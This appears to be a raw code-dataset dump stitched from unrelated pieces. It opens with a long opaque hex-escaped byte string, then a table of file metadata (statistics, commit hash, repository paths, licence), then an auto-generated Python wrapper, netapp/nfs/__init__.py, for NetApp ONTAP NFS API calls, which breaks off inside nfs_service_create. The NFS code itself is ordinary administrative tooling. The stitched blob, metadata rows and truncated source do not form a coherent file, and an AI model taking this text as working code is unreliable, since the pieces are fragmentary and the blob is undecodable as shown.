bb\xa4\xc9\x64\x18\xe6\xca\x7b\xce\x70\x38\x2e\xca\x0e\x8e\x28\x45\x22\x48\x2c\x5d\x58\xe6\xa9\x3a\xf8\x49\xca\xa3\x39\x9e\xb9\x02\xe1\xee\xde\xff\xd2\x32\xfc\x87\x64\xc2\x8e\x20\x0b\x3e\x48\xa1\xac\xfd\x28\xb0\x10\xe4\x98\x42\x6d\x8a\x99\xa6\x3c\x9b\xc7\xbc\x2a\x00\xc7\x64\x26\xcb\x61\x39\x52\x7e\x5c\xe4\x4c\x16\x11\x4f\x85\xda\xa2\x07\x4c\xa0\x99\x05\x51\x46\xdd\xf3\x13\xab\x16\x05\x68\xee\x08\x14\xf0\xd4\x97\xaf\xc7\x51\x78\x59\x38\xe1\x27\x42\x40\x1a\x3e\x22\xad\x8c\x34\x6e\x73\x10\x02\xac\x0c\x8b\xdf\xd6\xd5\x5c\xdb\xc8\x7e\x2e\x30\xcb\xee\x23\x4a\x68\xb7\x21\xad\x29\x2e\x59\x7c\xf9\x85\xd7\x62\xef\xee\xc8\xd2\xc0\xbc\x2c\xd5\x9d\x38\x6c\x39\x49\xa9\x2f\x2c\x35\xf6\x61\x14\x13\x62\x26\x1a\x2d\x8d\xfa\x9b\x36\xae\x24\xba\xc9\x28\x3c\x24\x52\x87\x7d\x62\x2e\x34\xdd\xd3\xc3\x95\x20\x96\xd4\x78\x97\x25\x63\xb9\x53\x00\xf5\x4a\x12\xb6\xd8\x8f\xad\x98\x9c\x7a\x1f\xc7\xf2\x63\xf4\x29\x3b\xfb\xca\x1d\x1a\x80\x87\xe0\x17\xe9\xb8\x32\x8d\x3b\x71\x72\xc2\x69\xba\x42\xec\xb8\x84\xf1\x56\xfb\x37\xfa\xf6\x5c\x76\x9e\x8b\x85\x4c\xeb\x03\xc6\x26\x9b\x2e\x37\xae\x93\x74\x68\xcd\x91\x30\x3e\x5f\x37\xd1\xa7\x76\x4c\xfd\x3c\xa5\xf7\xbe\xd2\xdb\x34\x35\x4c\x3c\x8c\x70\xe9\xec\x85\x9a\xe9\x4a\x9d\x43\xb2\x2a\xb9\xeb\xf5\xf4\xc4\xef\x9e\x4f\x28\x93\x00\x86\x0b\xfa\x26\x9a\xba\x69\x73\x54\x41\x10\xff\xba\x72\xe2\xe5\x3e\x6e\x5d\x99\x06\x2a\x0b\xc4\x26\xd3\x1d\x0b\x2d\x5c\x77\x9d\x03\x56\x8a\x84\x75\x39\xda\xb5\xe3\x9b\x1a\x24\xa0\xba\x4b\x6c\x92\xb9\x3e\x9d\x5f\x3e\x9e\xda\x4a\x16\x07\xaf\x08\x26\x04\x09\xe9\x0c\xec\x18\xed\xcc\xca\x90\xe3\xdc\x54\x1d\xd2\x9c\x4e\xe1\xf1\x07\x72\xc3\xbe\x35\xf6\x37\xb6\xa6\x66\x10\x3a\xbb\xb8\x9c\x0a\xf6\x66\x75\x4e\x7c\xaa\xbd\x1f\x52\x07\xf6\x11\xbd\x96\xb4\x34\x90\x6d\x06\x40\x68\x22\x3e\xb5\xdc\x32\xb7\x63\xc0\x7a\xd7\xd2\x5f\xe0\xf9\x56\x22\xcc\x08\xf1\x7c\xbf\x61\x4b\x66\xaa\x42\xfd\x0d\x48\xbf\x32\x52\x88\x99\x53\x0d\x4b\xf9\x29\x88\xd7\xe2\x2e\x42\x44\x60\x6f\x2f\x8b\x63\x94\x8e\xf2\x62\xb2\x82\xa9\xae\x22\xe7\x7b\x7a\x09\x74\x9d\x3c\xbd\xc1\x
e9\xd9\x0d\x84\xa1\x10\x80\x63\x10\x84\x7a\x65\xed\x4c\x89\x0d\x4a\x3c\x93\x9e\xaa\x25\x1e\xc8\xe5\xb3\x67\x4b\x88\x9d\x7a\xa4\x5a\xac\x0c\xcf\x34\x1c\x82\x80\x17\xdd\x2e\x9f\x8c\x98\x5e\x21\x1e\xab\x60\x57\x38\x6e\x3f\x31\x28\x09\x14\x41\xe9\x3a\xde\xca\x4e\x6c\xdb\x0c\x8e\x8e\x3b\x58\x3e\x03\xea\x28\xb3\x25\x2c\x1e\x5b\x1d\x4d\x1d\x32\xfc\x83\xd2\xa6\x15\x76\x07\x65\x9c\x08\xe1\xcf\x7a\x65\x8c\x7d\x3d\x3f\xc3\x99\xcc\x43\x96\xc0\x11\x4d\x61\x26\x59\x77\x25\x04\x98\xc7\x08\xa8\x83\x52\x62\xe4\xa1\xd7\xdd\x53\xdb\x2e\x11\xac\xfb\xbf\x51\x6c\x8a\x45\x12\xf7\x04\xf8\x2d\xbf\xfc\xd9\xca\xde\x2f\x25\x09', 2)
| 2,890.333333
| 8,611
| 0.750663
| 2,155
| 8,671
| 3.013921
| 0.12297
| 0.017552
| 0.018014
| 0.014781
| 0.006005
| 0.003695
| 0.003695
| 0
| 0
| 0
| 0
| 0.31232
| 0.001153
| 8,671
| 3
| 8,611
| 2,890.333333
| 0.437594
| 0
| 0
| 0
| 0
| 0.333333
| 0.988697
| 0.988697
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
4a37f6160c415d285d773357d335f0c2b1071e5e
| 56,621
|
py
|
Python
|
generated-libraries/python/netapp/nfs/__init__.py
|
radekg/netapp-ontap-lib-get
|
6445ebb071ec147ea82a486fbe9f094c56c5c40d
|
[
"MIT"
] | 2
|
2017-03-28T15:31:26.000Z
|
2018-08-16T22:15:18.000Z
|
generated-libraries/python/netapp/nfs/__init__.py
|
radekg/netapp-ontap-lib-get
|
6445ebb071ec147ea82a486fbe9f094c56c5c40d
|
[
"MIT"
] | null | null | null |
generated-libraries/python/netapp/nfs/__init__.py
|
radekg/netapp-ontap-lib-get
|
6445ebb071ec147ea82a486fbe9f094c56c5c40d
|
[
"MIT"
] | null | null | null |
from netapp.connection import NaConnection
from nfsv3_client_stats_info import Nfsv3ClientStatsInfo # 22 properties
from security_rule_info import SecurityRuleInfo # 6 properties
from rpc_data_info import RpcDataInfo # 5 properties
from nfsv2_client_stats_info import Nfsv2ClientStatsInfo # 18 properties
from hostaddr import Hostaddr # 0 properties
from rpc_stats_info import RpcStatsInfo # 2 properties
from nfschownmode import Nfschownmode # 0 properties
from exports_rule_info_2 import ExportsRuleInfo2 # 3 properties
from sec_flavor_info import SecFlavorInfo # 1 properties
from nfs_stats_info import NfsStatsInfo # 5 properties
from nfs_info import NfsInfo # 46 properties
from pathname_info import PathnameInfo # 1 properties
from exports_rule_info import ExportsRuleInfo # 8 properties
from nfs_service_get_iter_key_td import NfsServiceGetIterKeyTd # 1 properties
from owner_info import OwnerInfo # 2 properties
from nfs_top_info import NfsTopInfo # 10 properties
from nfsv4_client_stats_info import Nfsv4ClientStatsInfo # 44 properties
from tcp_flowcontrol_stats_info import TcpFlowcontrolStatsInfo # 4 properties
from exports_hostname_info import ExportsHostnameInfo # 3 properties
class NfsConnection(NaConnection):
def nfs_exportfs_storage_path(self, pathname):
    """
    Determine the actual storage path for the given virtual path.
    Returns an error if the path does not exist.

    :param pathname: Virtual pathname which has a rule associated with an actual
        pathname.
    """
    # Marshalling spec: [value, wire-name, [type, subtype], is-list].
    api_input = {
        'pathname': [pathname, 'pathname', [basestring, 'None'], False],
    }
    api_output = {
        'actual-pathname': [basestring, False],
    }
    return self.request("nfs-exportfs-storage-path", api_input, api_output)
def nfs_stats_top_clients_list_iter_start(self, maxclients=None):
    """
    Start an iteration through the top NFS clients, ordered by total
    NFS operations.

    :param maxclients: Maximum number of top clients to retrieve
        (the default is 20). Range: [1..2^32-1].
    """
    # Marshalling spec: [value, wire-name, [type, subtype], is-list].
    api_input = {
        'maxclients': [maxclients, 'maxclients', [int, 'None'], False],
    }
    api_output = {
        'records': [int, False],
        'tag': [basestring, False],
    }
    return self.request("nfs-stats-top-clients-list-iter-start", api_input, api_output)
def nfs_exportfs_fence_enable(self, fenced_hosts, fenced_paths=None, all_pathnames=None, persistent=None):
"""
Enables fencing to the given exports for the
given entry. This means that the entry will not have
write permission to the exports. The rule changes take effect
immediately. Set the persistent option to true to save the
rule in the /etc/exports file and keep the option persistent
upon loading or reboot.
:param fenced_hosts: An array of hostnames which are to be fenced off.
:param fenced_paths: An array of paths which are to be fenced off.
:param all_pathnames: Default value is false. Set to true to fence all rules.
'fenced-paths' option must be left empty if this option is true.
:param persistent: Default value is false. If true, modifies the etc/exports file
to append the rule for a permanent change. (The new rule still
takes effect immediately.) If false, only change the
exports in memory.
"""
return self.request( "nfs-exportfs-fence-enable", {
'fenced_paths': [ fenced_paths, 'fenced-paths', [ PathnameInfo, 'None' ], True ],
'all_pathnames': [ all_pathnames, 'all-pathnames', [ bool, 'None' ], False ],
'persistent': [ persistent, 'persistent', [ bool, 'None' ], False ],
'fenced_hosts': [ fenced_hosts, 'fenced-hosts', [ ExportsHostnameInfo, 'None' ], True ],
}, {
} )
def nfs_monitor_add(self, hosts):
"""
starts monitoring the specified hosts for NFS lock recovery
purposes. The specified hosts are added to the list of
of clients that will be notified of lock recovery in the
event of an NFS server crash/reboot. For more information,
see the sm_mon(1a) manual page.
:param hosts: an array of hosts that are to be monitored.
"""
return self.request( "nfs-monitor-add", {
'hosts': [ hosts, 'hosts', [ basestring, 'hostaddr' ], True ],
}, {
} )
def nfs_stats_get_client_stats(self, host):
"""
Collects NFS statistics for a specified client
:param host: Hostname or IP address of client
"""
return self.request( "nfs-stats-get-client-stats", {
'host': [ host, 'host', [ basestring, 'None' ], False ],
}, {
'nfs-stats': [ NfsStatsInfo, False ],
'client-info': [ basestring, False ],
'rpc-stats': [ RpcStatsInfo, False ],
'tcp-flowcontrol-stats': [ TcpFlowcontrolStatsInfo, False ],
} )
def nfs_exportfs_check_permission(self, host, pathname, permission):
"""
Returns true if the host IP has mount permissions for a
specified path.
:param host: IP address of the host to check in dotted decimal format:
AAA.BBB.CCC.DDD
:param pathname: Returns the permissions for this path.
:param permission: Possible values: "read-only", "read-write", and "root".
"""
return self.request( "nfs-exportfs-check-permission", {
'host': [ host, 'host', [ basestring, 'None' ], False ],
'pathname': [ pathname, 'pathname', [ basestring, 'None' ], False ],
'permission': [ permission, 'permission', [ basestring, 'None' ], False ],
}, {
'is-permissible': [ bool, False ],
} )
def nfs_status(self):
"""
Returns the status of the NFS server.
"""
return self.request( "nfs-status", {
}, {
'is-drained': [ bool, False ],
'is-enabled': [ bool, False ],
} )
def nfs_exportfs_modify_rule(self, persistent, rule):
"""
Functionally similar to append with the following caveats.
Returns an error if the rule does not exist.
Only works for one rule at a time.
:param persistent: In Data ONTAP 7-Mode, default value is false. If true, modifies
the etc/exports file to append the rule for a permanent change.
(The new rule still takes effect immediately.)
In Data ONTAP Cluster-Mode, the export entries are always
persistent. Default value is true. If false, an error will be
returned.
:param rule: The rule to modify. Returns an error if a previous rule with
the same pathname is not already loaded into memory.
"""
return self.request( "nfs-exportfs-modify-rule", {
'persistent': [ persistent, 'persistent', [ bool, 'None' ], False ],
'rule': [ rule, 'rule', [ ExportsRuleInfo, 'None' ], False ],
}, {
} )
def nfs_stats_top_clients_list_iter_next(self, tag, maximum):
"""
Continues the nfs-stats-top-clients-list-iter-start iteration
through the top NFS clients, ordered by total NFS operations.
:param tag: Tag from a previous nfs-stats-top-iter-start
:param maximum: The maximum number of entries to retrieve.
Range : [0..2^32-1].
"""
return self.request( "nfs-stats-top-clients-list-iter-next", {
'tag': tag,
'maximum': [ maximum, 'maximum', [ int, 'None' ], False ],
}, {
'records': [ int, False ],
'nfs-top': [ NfsTopInfo, True ],
} )
def nfs_service_get(self, desired_attributes=None):
"""
Get the NFS server configuration.
:param desired_attributes: Specify the attributes that should be returned.
If not present, all attributes for which information is available
will be returned.
If present, only the desired attributes for which information is
available will be returned.
"""
return self.request( "nfs-service-get", {
'desired_attributes': [ desired_attributes, 'desired-attributes', [ NfsInfo, 'None' ], False ],
}, {
'attributes': [ NfsInfo, False ],
} )
def nfs_monitor_reclaim(self, hosts=None):
"""
reclaims the NFS locks for the specified client hosts. If
no hosts are specified, then all the clients locks are
removed and are notified about lock recovery, as if an
NFS server crash/reboot had happened. If any hosts are
specified, then only those client hosts locks are reclaimed
For more information, see the sm_mon(1a) manual page.
:param hosts: hosts whose locks have to be reclaimed. If no hosts
are specified, then all the clients locks are reclaimed.
"""
return self.request( "nfs-monitor-reclaim", {
'hosts': [ hosts, 'hosts', [ basestring, 'hostaddr' ], True ],
}, {
} )
def nfs_exportfs_fence_disable(self, fenced_hosts, fenced_paths=None, remove_locks=None, all_pathnames=None, persistent=None):
"""
Disables fencing to the given exports for the
given entry. This means that the entry will have
write permission to the exports. The rule changes take effect
immediately. Set the persistent option to true to save the rule
in the /etc/exports file and keep the option persistent upon
loading or reboot.
:param fenced_hosts: An array of hostnames which are to be fenced off.
:param fenced_paths: An array of paths which are to be fenced off.
:param remove_locks: Default value is false. Set to true to reclaim locks of the
specified fenced-hosts.
:param all_pathnames: Default value is false. Set to true to unfence all rules.
'fenced-paths' option must be left empty if this option is true.
:param persistent: Default value is false. If true, modifies the etc/exports file
to append the rule for a permanent change. (The new rule still
takes effect immediately.) If false, only change the
exports in memory.
"""
return self.request( "nfs-exportfs-fence-disable", {
'fenced_paths': [ fenced_paths, 'fenced-paths', [ PathnameInfo, 'None' ], True ],
'remove_locks': [ remove_locks, 'remove-locks', [ bool, 'None' ], False ],
'all_pathnames': [ all_pathnames, 'all-pathnames', [ bool, 'None' ], False ],
'persistent': [ persistent, 'persistent', [ bool, 'None' ], False ],
'fenced_hosts': [ fenced_hosts, 'fenced-hosts', [ ExportsHostnameInfo, 'None' ], True ],
}, {
} )
def nfs_exportfs_modify_rule_2(self, persistent, rule):
"""
Functionally similar to append-2 with the following caveats.
Returns an error if the rule does not exist.
Only works for one rule at a time.
:param persistent: In Data ONTAP 7-Mode, default value is false. If true, modifies
the etc/exports file to append the rule for a permanent change.
(The new rule still takes effect immediately.)
In Data ONTAP Cluster-Mode, the export entries are always
persistent. Default value is true. If false, an error will be
returned.
:param rule: The rule to modify. Returns an error if a previous rule with
the same pathname is not already loaded into memory.
"""
return self.request( "nfs-exportfs-modify-rule-2", {
'persistent': [ persistent, 'persistent', [ bool, 'None' ], False ],
'rule': [ rule, 'rule', [ ExportsRuleInfo2, 'None' ], False ],
}, {
} )
def nfs_stats_zero_stats(self):
"""
Set all NFS statistcs to zero
"""
return self.request( "nfs-stats-zero-stats", {
}, {
} )
def nfs_exportfs_list_rules(self, pathname=None, persistent=None):
"""
Returns the rules associated with exports. If a pathname
is specified, the rules associated with the export matching
that pathname, are returned; otherwise, rules for all exports
are returned.
:param pathname: The pathname, for whose matching export, the client wants
a listing of the associated rules. If this parameter is
provided, the persistent parameter is ignored.
:param persistent: In Data ONTAP 7-Mode, default value is false. If true,
the export entries that are present in the /etc/exports file
are returned; otherwise, those loaded in memory are returned.
This parameter is ignored, if the pathname parameter is
provided.
In Data ONTAP Cluster-Mode, the export entries are always
persistent. Default value is true. If false, an empty list
will be returned.
"""
return self.request( "nfs-exportfs-list-rules", {
'pathname': [ pathname, 'pathname', [ basestring, 'None' ], False ],
'persistent': [ persistent, 'persistent', [ bool, 'None' ], False ],
}, {
'rules': [ ExportsRuleInfo, True ],
} )
def nfs_exportfs_append_rules_2(self, rules, persistent=None, verbose=None):
"""
Enables pathnames for mounting according to the rules
specified. New rules for the pathnames take effect immediately,
ignoring previous rules for specified pathnames.
In the Data ONTAP 7-Mode, set the persistent option to true to
save the rule in the etc/exports file and keep the option
persistent upon loading or reboot whereas it must be true in
Data ONTAP Cluster-Mode as the export entries are always
persistent.
The new security-rule-info structure contains finer grained
information about security rules than exports-rule-info.
:param rules: List of rules to add to the exports table.
:param persistent: In Data ONTAP 7-Mode, default value is false. If true, modifies
the etc/exports file to append the rule for a permanent change.
(The new rule still takes effect immediately.)
In Data ONTAP Cluster-Mode, the export entries are always
persistent. Default value is true. If false, an error will be
returned.
:param verbose: If true, returns a list of directories which were appended.
Errors during the append are recorded in the 'results' field
error and 'loaded-pathnames' will contain which pathnames
were successfully appended. Default value is false.
"""
return self.request( "nfs-exportfs-append-rules-2", {
'rules': [ rules, 'rules', [ ExportsRuleInfo2, 'None' ], True ],
'persistent': [ persistent, 'persistent', [ bool, 'None' ], False ],
'verbose': [ verbose, 'verbose', [ bool, 'None' ], False ],
}, {
'exported-pathnames': [ PathnameInfo, True ],
'loaded-pathnames': [ PathnameInfo, True ],
} )
def nfs_monitor_list(self):
"""
Lists the hosts that are currently being monitored by the
NFS status monitor.
"""
return self.request( "nfs-monitor-list", {
}, {
'hosts': [ basestring, True ],
} )
def nfs_monitor_remove(self, hosts):
"""
Starts unmonitoring the specified hosts for NFS lock
recovery purposes. The specified hosts are removed
from the list of clients that will be notified of lock
recovery in the event of an NFS server crash/reboot. For
more information, see the sm_mon(1a) manual page.
:param hosts: an array of hosts that are to be unmonitored.
"""
return self.request( "nfs-monitor-remove", {
'hosts': [ hosts, 'hosts', [ basestring, 'hostaddr' ], True ],
}, {
} )
def nfs_exportfs_load_exports(self, persistent_only=None):
"""
Loads the etc/exports file into memory. Replaces exports
rules already residing in memory.
:param persistent_only: Default value is false. If true, atomically reloads each
rule from the exports file and unloads all other rules.
"""
return self.request( "nfs-exportfs-load-exports", {
'persistent_only': [ persistent_only, 'persistent-only', [ bool, 'None' ], False ],
}, {
} )
def nfs_disable(self):
"""
In Data ONTAP 7-Mode, this API will disable NFS server
access (effectively same as the CLI command "nfs off")
In Data ONTAP Cluster-Mode, this will stop the Vserver's
NFS service. If the NFS service was not explicitly created,
this API does nothing.
"""
return self.request( "nfs-disable", {
}, {
} )
def nfs_get_supported_sec_flavors(self):
"""
Returns a list of currently supported security flavors.
Hosts with permmisions and connecting via the proper security
flavor have access to directories on the filer. Default
security flavor for all exports is "sys".
"""
return self.request( "nfs-get-supported-sec-flavors", {
}, {
'sec-flavor': [ SecFlavorInfo, True ],
} )
def nfs_exportfs_append_rules(self, rules, persistent=None, verbose=None):
"""
Enables pathnames for mounting according to the rules
specified. New rules for the pathnames take effect immediately,
ignoring previous rules for specified pathnames.
In the Data ONTAP 7-Mode, set the persistent option to true to
save the rule in the etc/exports file and keep the option
persistent upon loading or reboot whereas it must be true in
Data ONTAP Cluster-Mode as the export entries are always
persistent.
:param rules: List of rules to add to the exports table.
:param persistent: In Data ONTAP 7-Mode, default value is false. If true, modifies
the etc/exports file to append the rule for a permanent change.
(The new rule still takes effect immediately.)
In Data ONTAP Cluster-Mode, the export entries are always
persistent. Default value is true. If false, an error will be
returned.
:param verbose: If true, returns a list of directories which were appended.
Errors during the append are recorded in the 'results' field
error and 'loaded-pathnames' will contain which pathnames
were successfully appended. Default value is false.
"""
return self.request( "nfs-exportfs-append-rules", {
'rules': [ rules, 'rules', [ ExportsRuleInfo, 'None' ], True ],
'persistent': [ persistent, 'persistent', [ bool, 'None' ], False ],
'verbose': [ verbose, 'verbose', [ bool, 'None' ], False ],
}, {
'exported-pathnames': [ PathnameInfo, True ],
'loaded-pathnames': [ PathnameInfo, True ],
} )
def nfs_service_get_create_defaults(self, attributes=None):
"""
Obtain the default values for NFS server configuration.
:param attributes: Optionally specify the value for attributes if available.
The default values for some attributes may depend on the values
specified for some other attribute.
"""
return self.request( "nfs-service-get-create-defaults", {
'attributes': [ attributes, 'attributes', [ NfsInfo, 'None' ], False ],
}, {
'defaults': [ NfsInfo, False ],
} )
def nfs_service_create(self, is_nfsv3_connection_drop_enabled=None, is_nfsv3_enabled=None, default_windows_user=None, is_nfsv41_acl_preserve_enabled=None, is_nfsv40_referrals_enabled=None, is_nfsv41_pnfs_enabled=None, is_nfsv40_migration_enabled=None, chown_mode=None, is_nfsv41_referrals_enabled=None, nfsv41_implementation_id_domain=None, nfsv41_implementation_id_name=None, is_nfsv4_numeric_ids_enabled=None, is_nfsv40_acl_enabled=None, is_nfs_access_enabled=None, rpcsec_ctx_idle=None, is_nfsv2_enabled=None, nfsv4_acl_max_aces=None, is_nfsv4_fsid_change_enabled=None, is_nfsv40_req_open_confirm_enabled=None, nfsv4_id_domain=None, is_nfsv40_read_delegation_enabled=None, is_nfs_rootonly_enabled=None, is_nfsv41_pnfs_striped_volumes_enabled=None, nfsv41_implementation_id_time=None, is_nfsv41_acl_enabled=None, is_nfsv40_write_delegation_enabled=None, ntfs_unix_security_ops=None, is_mount_rootonly_enabled=None, nfsv4x_session_num_slots=None, enable_ejukebox=None, nfsv4x_session_slot_reply_cache_size=None, rpcsec_ctx_high=None, is_nfsv41_read_delegation_enabled=None, is_vstorage_enabled=None, is_nfsv3_fsid_change_enabled=None, nfsv4_grace_seconds=None, nfsv4_lease_seconds=None, return_record=None, is_nfsv41_write_delegation_enabled=None, is_nfsv41_migration_enabled=None, is_validate_qtree_export_enabled=None, is_nfsv41_enabled=None, is_nfsv40_enabled=None, default_windows_group=None, is_nfsv41_state_protection_enabled=None):
"""
Create a new NFS configuration.
:param is_nfsv3_connection_drop_enabled: If 'true', then connection is dropped when an NFSv3 request is
dropped. Default value is 'true'.
:param is_nfsv3_enabled: If 'true', then NFS version 3 is enabled. Default value is
'true'.
:param default_windows_user: The default windows user for CIFS access.
:param is_nfsv41_acl_preserve_enabled: If 'true', the NFSv4 server will preserve and modify ACL when
chmod <mode> is done. Default value is 'true'.
:param is_nfsv40_referrals_enabled: If 'true', then NFSv4.0 Referrals feature is enabled. Default
value is 'false'.
:param is_nfsv41_pnfs_enabled: If 'true', then Parallel NFS support for NFS version 4.1 is
enabled. Default value is 'true'.
:param is_nfsv40_migration_enabled: If 'true', then NFSv4.0 Migration feature is enabled. Default
value is 'false'.
:param chown_mode: Vserver Change Ownership Mode. Possible values are 'ignore',
'fail', 'use_export_policy'. If 'use_export_policy' is set,
export policy option is used. Default value is
'use_export_policy'.
Possible values:
<ul>
<li> "restricted" ,
<li> "unrestricted" ,
<li> "use_export_policy"
</ul>
:param is_nfsv41_referrals_enabled: If 'true', then NFSv4.1 Referrals feature is enabled. Default
value is 'false'.
:param nfsv41_implementation_id_domain: NFSv4.1 Implementation id domain. Default value is
'defaultv41impliddomain.com'.
:param nfsv41_implementation_id_name: NFSv4.1 Implementation id name. Default value is
'defaultv41implidname'.
:param is_nfsv4_numeric_ids_enabled: If 'true', then NFSv4 support for Numeric Owner IDs is enabled.
Default value is 'true'.
:param is_nfsv40_acl_enabled: If 'true', then NFSv4.0 ACL feature is enabled. Default value is
'false'.
:param is_nfs_access_enabled: If 'true',then NFS server access is enabled. Default value is
'true'.
:param rpcsec_ctx_idle: Time in seconds before an idle entry in RPCSEC_GSS context cache
is deleted. Default value is 0.
:param is_nfsv2_enabled: Starting Data ONTAP 8.2, NFS v2 is no longer supported. Default
value is 'false'.
:param nfsv4_acl_max_aces: Maximum Number of ACEs allowed in an ACL. Range is 192 to 1024.
Default value is 400.
:param is_nfsv4_fsid_change_enabled: If 'true', then clients see change in FSID as NFSv4 clients
traverse filesystems. Default value is 'true'.
:param is_nfsv40_req_open_confirm_enabled: If 'true', then the server will require an OPEN_CONFIRM operation
for all NFSv4.0 clients. Default value is 'false'.
:param nfsv4_id_domain: NFSv4 ID mapping domain. Default value is
'defaultv4iddomain.com'.
:param is_nfsv40_read_delegation_enabled: If 'true', NFSv4.0 read delegation feature is enabled. Default
value is 'false'.
:param is_nfs_rootonly_enabled: If 'true', then the vserver allows NFS protocol calls only from
privileged ports (port numbers less than 1024). Default value is
'false'.
:param is_nfsv41_pnfs_striped_volumes_enabled: If 'true', Striped volume support for Parallel NFS is enabled .
Default value is 'false'.
:param nfsv41_implementation_id_time: NFSv4.1 Implementation id time.The number of seconds since
January 1, 1970.
:param is_nfsv41_acl_enabled: If 'true', then NFSv4.1 ACL feature is enabled. Default value is
'false'.
:param is_nfsv40_write_delegation_enabled: If 'true', NFSv4.0 write delegation feature is enabled. Default
value is 'false'.
:param ntfs_unix_security_ops: Ignore/Fail unix security operations on NTFS volumes. Possible
values are 'ignore', 'fail','use_export_policy'. If
'use_export_policy' is set, export policy option is used.
Default value is 'use_export_policy'.
:param is_mount_rootonly_enabled: If 'true', then the vserver allows MOUNT protocol calls only from
privileged ports (port numbers less than 1024). Default value is
'true'.
:param nfsv4x_session_num_slots: Number of Slots in the NFSv4.x Session Slot Tables. Default value
is 180.
:param enable_ejukebox: If 'true', then the NFS server will send EJUKEBOX error on server
delays.
:param nfsv4x_session_slot_reply_cache_size: Size of the Reply that will be Cached in Each NFSv4.x Session
Slot (in bytes). Default value is 640.
:param rpcsec_ctx_high: High water mark for the RPCSEC_GSS Context Cache. Default value
is 0.
:param is_nfsv41_read_delegation_enabled: If 'true', NFSv4.1 read delegation feature is enabled. Default
value is 'false'.
:param is_vstorage_enabled: If 'true', then enables the usage of vStorage protocol for server
side copies, which is mostly used in hypervisors. Default value
is 'false'.
:param is_nfsv3_fsid_change_enabled: If 'true', then NFSv3 clients see change in FSID as they traverse
filesystems. Default value is 'true'.
:param nfsv4_grace_seconds: NFSv4 Grace timeout value in seconds. Default value is 45
seconds.
:param nfsv4_lease_seconds: NFSv4 Lease timeout value in seconds. Default value is 30
seconds.
:param return_record: If set to true, returns the NFS Server on successful creation.
Default: false
:param is_nfsv41_write_delegation_enabled: If 'true', NFSv4.1 write delegation feature is enabled. Default
value is 'false'.
:param is_nfsv41_migration_enabled: If 'true', then NFSv4.1 Migration feature is enabled. Default
value is 'false'.
:param is_validate_qtree_export_enabled: If 'true', then the Vserver performs additional validation for
qtree. Default value is 'true'.
:param is_nfsv41_enabled: If 'true', then NFS version 4.1 is enabled. Default value is
'false'.
:param is_nfsv40_enabled: If 'true', then NFS version 4.0 is enabled. Default value is
'false'.
:param default_windows_group: The default windows group for CIFS access.
:param is_nfsv41_state_protection_enabled: If 'true', then NFSv4.1 State Protection is enabled. Default
value is 'true'.
"""
return self.request( "nfs-service-create", {
'is_nfsv3_connection_drop_enabled': [ is_nfsv3_connection_drop_enabled, 'is-nfsv3-connection-drop-enabled', [ bool, 'None' ], False ],
'is_nfsv3_enabled': [ is_nfsv3_enabled, 'is-nfsv3-enabled', [ bool, 'None' ], False ],
'default_windows_user': [ default_windows_user, 'default-windows-user', [ basestring, 'None' ], False ],
'is_nfsv41_acl_preserve_enabled': [ is_nfsv41_acl_preserve_enabled, 'is-nfsv41-acl-preserve-enabled', [ bool, 'None' ], False ],
'is_nfsv40_referrals_enabled': [ is_nfsv40_referrals_enabled, 'is-nfsv40-referrals-enabled', [ bool, 'None' ], False ],
'is_nfsv41_pnfs_enabled': [ is_nfsv41_pnfs_enabled, 'is-nfsv41-pnfs-enabled', [ bool, 'None' ], False ],
'is_nfsv40_migration_enabled': [ is_nfsv40_migration_enabled, 'is-nfsv40-migration-enabled', [ bool, 'None' ], False ],
'chown_mode': [ chown_mode, 'chown-mode', [ basestring, 'nfschownmode' ], False ],
'is_nfsv41_referrals_enabled': [ is_nfsv41_referrals_enabled, 'is-nfsv41-referrals-enabled', [ bool, 'None' ], False ],
'nfsv41_implementation_id_domain': [ nfsv41_implementation_id_domain, 'nfsv41-implementation-id-domain', [ basestring, 'None' ], False ],
'nfsv41_implementation_id_name': [ nfsv41_implementation_id_name, 'nfsv41-implementation-id-name', [ basestring, 'None' ], False ],
'is_nfsv4_numeric_ids_enabled': [ is_nfsv4_numeric_ids_enabled, 'is-nfsv4-numeric-ids-enabled', [ bool, 'None' ], False ],
'is_nfsv40_acl_enabled': [ is_nfsv40_acl_enabled, 'is-nfsv40-acl-enabled', [ bool, 'None' ], False ],
'is_nfs_access_enabled': [ is_nfs_access_enabled, 'is-nfs-access-enabled', [ bool, 'None' ], False ],
'rpcsec_ctx_idle': [ rpcsec_ctx_idle, 'rpcsec-ctx-idle', [ int, 'None' ], False ],
'is_nfsv2_enabled': [ is_nfsv2_enabled, 'is-nfsv2-enabled', [ bool, 'None' ], False ],
'nfsv4_acl_max_aces': [ nfsv4_acl_max_aces, 'nfsv4-acl-max-aces', [ int, 'None' ], False ],
'is_nfsv4_fsid_change_enabled': [ is_nfsv4_fsid_change_enabled, 'is-nfsv4-fsid-change-enabled', [ bool, 'None' ], False ],
'is_nfsv40_req_open_confirm_enabled': [ is_nfsv40_req_open_confirm_enabled, 'is-nfsv40-req-open-confirm-enabled', [ bool, 'None' ], False ],
'nfsv4_id_domain': [ nfsv4_id_domain, 'nfsv4-id-domain', [ basestring, 'None' ], False ],
'is_nfsv40_read_delegation_enabled': [ is_nfsv40_read_delegation_enabled, 'is-nfsv40-read-delegation-enabled', [ bool, 'None' ], False ],
'is_nfs_rootonly_enabled': [ is_nfs_rootonly_enabled, 'is-nfs-rootonly-enabled', [ bool, 'None' ], False ],
'is_nfsv41_pnfs_striped_volumes_enabled': [ is_nfsv41_pnfs_striped_volumes_enabled, 'is-nfsv41-pnfs-striped-volumes-enabled', [ bool, 'None' ], False ],
'nfsv41_implementation_id_time': [ nfsv41_implementation_id_time, 'nfsv41-implementation-id-time', [ int, 'date' ], False ],
'is_nfsv41_acl_enabled': [ is_nfsv41_acl_enabled, 'is-nfsv41-acl-enabled', [ bool, 'None' ], False ],
'is_nfsv40_write_delegation_enabled': [ is_nfsv40_write_delegation_enabled, 'is-nfsv40-write-delegation-enabled', [ bool, 'None' ], False ],
'ntfs_unix_security_ops': [ ntfs_unix_security_ops, 'ntfs-unix-security-ops', [ basestring, 'None' ], False ],
'is_mount_rootonly_enabled': [ is_mount_rootonly_enabled, 'is-mount-rootonly-enabled', [ bool, 'None' ], False ],
